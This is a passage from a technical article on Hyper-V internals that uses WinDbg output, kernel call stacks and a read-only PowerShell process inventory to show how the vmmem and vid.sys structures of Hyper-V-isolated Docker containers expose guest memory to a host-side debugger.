<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Script output for Windows Server 2019 guest OS:</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 243px; overflow: hidden; width: 624px;"><img height="243" src="https://lh3.googleusercontent.com/D-CnHrHjEkeiSXfm82c8C2fJyQJxFWDkaNTzAGAUQNgnMEI-23vezJp7rUt08O6pO2kn_YpTE1n-onGVw1tm6fh234NwfLtr9TCR04LlSCy_Eb5cteHMzm3ut_kkP8E-tthE-XA" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The number of GPAR and memory block objects for containers is much larger:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 237px; overflow: hidden; width: 483px;"><img height="237" src="https://lh3.googleusercontent.com/AOb1MVdt2gM5hbpLmpgc2Icb_vR0qbw-ZlrRtFOFMXSnWvkvYSUNYnKyArVPhjPN804yx9kK-HrPxK2Gy0A8aThOJItwdFN-QxOzthPkuuzghNRGgWcL4u6uGjxI7PO0BD8jwE0" style="margin-left: 0px; margin-top: 0px;" width="483" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 250px; overflow: hidden; width: 354px;"><img height="250" src="https://lh6.googleusercontent.com/18gVX8O91et6zDBXEorrmM2j08qB6lzxQOsWFy2TlR_D6cSBlEhq-3uGPQPtoBvRdtprSGIcRZ9mp4XB-SgynpqGJW1VtJI0YKAanG7JutOIH6mzFgFY4_-BXEr1Y4aSEKCN64g" style="margin-left: 0px; margin-top: 0px;" width="354" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In Hyper-V containers all MBlock objects contain zeros, like this:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">0: kd> dc 0xffff958b7f0d14d0</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff958b`7f0d14d0 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff958b`7f0d14e0 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff958b`7f0d14f0 00000000 00000000 00000000 00000000 ................</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">There is an additional type of block inside the vid.sys driver: the reserve bucket block (VSMM_RESERVE_BUCKET):</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 55px; overflow: hidden; width: 213px;"><img height="55" src="https://lh5.googleusercontent.com/tbPVTx_zqhvqnjZUp57Av7QxAm8pi8XI4GRoMBBza8u3BFXhZIc0zcPbmjHEK0Bmqz8AkJ0-WLfquCZfYpK5188iRomqNUO4QrV4ROOlVRqryvtcCL-U3PHGDE0zMC6-WjyKdDs" style="margin-left: 0px; margin-top: 0px;" width="213" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">But it is not needed for reading guest OS memory in the standard case. We can see that the pointers point to themselves (0x10 alignment).</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Docker container with Hyper-V isolation mode</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">A Docker container in Hyper-V isolation mode creates quite a lot of processes (these are the processes for one Windows Server 2019 nanoserver 1809 container):</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 67px; overflow: hidden; width: 487px;"><img height="67" src="https://lh6.googleusercontent.com/3YPxVOdT1X0Bn6iyw1V82V8WctvirOZ7fkR_U5dXDrpFUuZ6GlIdN0vcXRMVTCH8ACbvCgNpwzPHav5JR4xDqVqH4LSeQND_uPBCosv2znDCU41g2rzq1dyICSh22JVivZNJKSc" style="margin-left: 0px; margin-top: 0px;" width="487" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We see 2 partition handles (one per vmwp.exe process). The name of the 1</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="font-size: 0.6em; vertical-align: super;">st</span></span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> of them matches the name of the user in whose context the process runs.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 133px; overflow: hidden; width: 451px;"><img height="133" src="https://lh6.googleusercontent.com/nNncpUpq1FuLjYxrWxgU9DSekoImRctnX92g6iPs1UNNZjNZTKgYcU7RGsoqTc6MplL_n_cfAGKx8epEtkzX_TfdEez2R8d-ftOycqdWasM20krvVleKMKiLbp27AZ56g1w1fmg" style="margin-left: 0px; margin-top: 0px;" width="451" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">However, this partition has an irrelevant table of MBlock objects:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 88px; overflow: hidden; width: 435px;"><img height="88" src="https://lh4.googleusercontent.com/DKQBX9ymWZ5FYlNCjW0EaScir0GHRZXE1k1HvOm1aWl3bVNNyaso3heUUeq_HwtsgVOpFaFhtupJJ4I-ao6n9zQBxcDQRqDBa-rDJWwODLiWfy70sJPHAE44x7QnwOhv11ZsDp8" style="margin-left: 0px; margin-top: 0px;" width="435" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The element count is 0x8e, but there is only one MBlock object, and it is empty.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The name of the 2nd partition matches the identifier created for the container, and this partition contains the NT kernel data needed to access the container's memory with WinDbg.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 149px; overflow: hidden; width: 546px;"><img height="149" src="https://lh3.googleusercontent.com/7bX2VfAgsLSpQKycEBoKfY69GKXsASIbcgvoWGLlY6Z64L9MIiVJu6HBtDqo2GY1lCpGucsa6wagI6GhBeF8f14LAh2oskTemJAXkFZOIABgQ0TP1njDqSuh_nfE68koKs56m5U" style="margin-left: 0px; margin-top: 0px;" width="546" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The base address is the same as the Vmmem GPA Offset parameter, which is used for reading a memory block from the context of the vmmem process.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 232px; overflow: hidden; width: 360px;"><img height="232" src="https://lh4.googleusercontent.com/CNRW0OLZDjrEL-OgdzAkynnSXu9CZrc6_eLSmYWjLdbpiCqfFLn0RkqEtJzdQgxm__uzAaVQVkdNZllach2N32lPcuprd4vBHnyFOxGXTWuppGYpRltERiBQQKWMTyfIhf-auB4" style="margin-left: 0px; margin-top: 0px;" width="360" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The offset of the file-mapping region in the other vmmem instance is the same as the VmmemGPA offset used by the hvmm.sys driver.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 259px; overflow: hidden; width: 457px;"><img height="259" src="https://lh6.googleusercontent.com/HjMQXoZjR2I955f0AyqDzR1Tozg93OwAowzeup_Xz100vmFBYmKhQ-gGHYs-OBxlLSoLeDOkkwA565KfAPAMmaxlBPytczgZz8OleqpBeFPWGN2jeZBZMCLHRVXdosBL8vI36n4" style="margin-left: 0px; margin-top: 0px;" width="457" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Different vmmem processes load different executables; in the process with fewer files, however, the number of active threads is 0.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 286px; overflow: hidden; width: 445px;"><img height="286" src="https://lh4.googleusercontent.com/hyKCwRrwIslii8V197p9rFjCUCIM_omV2psWQNlRsa9ARXQjg7acwbZB2s-y_-mkXQ8l-AgAft1Fkit5yVMAcrotSbPAHqI-9xPBecWo2OtiPmftfF4tj-ML6-gMub0hCUdm88Y" style="margin-left: 0px; margin-top: 0px;" width="445" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 148px; overflow: hidden; width: 328px;"><img height="148" src="https://lh4.googleusercontent.com/WRgsuGg5IT8HAMtSENqmdYtwnr7DtYObGlRPQKisst8KpNhb-VDCLlelnxdD3HnRJJArgNHGt7bYYXZB83KcsNsegPcWlUJka5duTI-3VPyjjdQoegzvQ6-uJx3IR1V_cNPF744" style="margin-left: 0px; margin-top: 0px;" width="328" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The 2nd vmmem process of the Docker container is not critical to execution. It can be killed through Process Hacker (its memory size will be several tens of kilobytes). The 1st vmmem process is also not needed for reading memory: the registers of the section to which the process is attached have the correct values, but reading kernel-mode memory returns zeros.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After stopping the two aforementioned vmmem processes, you can still safely start processes inside the container with docker exec.</span></div>
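<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The observation above (several vmmem processes per container, one of them with zero threads and few loaded images) can be checked without a debugger. The following PowerShell inventory is an added example, not code from the article or from the LiveCloudKd project: it lists every vmmem and vmwp process on the host with its thread, handle and module counts and flags idle vmmem instances. It assumes an elevated session on the Hyper-V host; the process names are the ones used in the article, and the IdleVmmem column is an assumption derived from the zero-thread observation, not a documented Hyper-V property.</span></div>

```powershell
# Added example (not from the original article or project): inventory the
# vmmem and vmwp processes that back Hyper-V partitions on a host, so the
# "empty" vmmem process (0 threads, few loaded images) can be told apart from
# the one that actually holds the guest's memory. Run elevated on the host.

function Get-HyperVWorkerInventory {
    [CmdletBinding()]
    param(
        # Process names to inspect; defaults to the two discussed in the article.
        [string[]]$ProcessName = @('vmmem', 'vmwp')
    )

    foreach ($proc in Get-Process -Name $ProcessName -ErrorAction SilentlyContinue) {
        # Minimal processes such as vmmem may expose no module list at all;
        # treat an access error as "n/a" instead of failing the whole listing.
        $moduleCount = 'n/a'
        try {
            $moduleCount = @($proc.Modules).Count
        } catch {
            $moduleCount = 'n/a'
        }

        # StartTime can also be inaccessible for protected/minimal processes.
        $startTime = $null
        try { $startTime = $proc.StartTime } catch { $startTime = $null }

        $threadCount = $proc.Threads.Count

        [pscustomobject]@{
            Name          = $proc.ProcessName
            Pid           = $proc.Id
            Threads       = $threadCount
            Handles       = $proc.HandleCount
            WorkingSetKB  = [int]($proc.WorkingSet64 / 1KB)
            LoadedModules = $moduleCount
            StartTime     = $startTime
            # Assumption (from the article's observation): a vmmem process with
            # no active threads is the auxiliary instance, not the memory owner.
            IdleVmmem     = ($proc.ProcessName -eq 'vmmem' -and $threadCount -eq 0)
        }
    }
}

# Usage: show each vmmem/vmwp process, with idle vmmem instances flagged.
Get-HyperVWorkerInventory |
    Sort-Object Name, Pid |
    Format-Table Name, Pid, Threads, Handles, WorkingSetKB, LoadedModules, IdleVmmem -AutoSize
```

<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The function only reads process metadata; it does not terminate anything, so it is safe to run on a production host to see which vmmem instance a given partition is using before attaching a debugger.</span></div>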
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Call stacks of vmmem creation (three calls per container start):</span></div>
<div align="left" dir="ltr" style="margin-left: -5.4pt;">
<table style="border-collapse: collapse; border: none;"><colgroup><col width="169"></col><col width="222"></col><col width="232"></col></colgroup><tbody>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1st PsCreateMinimalProcess</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">2nd PsCreateMinimalProcess</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">3rd PsCreateMinimalProcess</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">: kd> kcn</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># Call Site</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00 nt!PsCreateMinimalProcess</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 nt!VmCreateMemoryProcess</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 Vid!VsmmNtSlatMemoryProcessCreate</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 </span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Vid!VsmmProcesspMicroVmSetup</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">………………………………………</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">14 vmwp!VidPartitionManager::Initialize</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">15 vmwp!VidPartitionManager::CreateInstance</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2: kd> kcn</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># Call Site</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00 nt!PsCreateMinimalProcess</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 nt!VmCreateMemoryProcess</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 Vid!VsmmNtSlatMemoryProcessCreate</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">03 Vid!VsmmClonepTemplateCreate</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">………………………………………</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">13 vmwp!WorkerTaskSaving::StartSave</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">14 vmwp!WorkerTaskSaving::RunSaveSteps</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">15 vmwp!WorkerTaskSaving::RunTask</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">0: kd> kcn</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># Call Site</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00 nt!PsCreateMinimalProcess</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
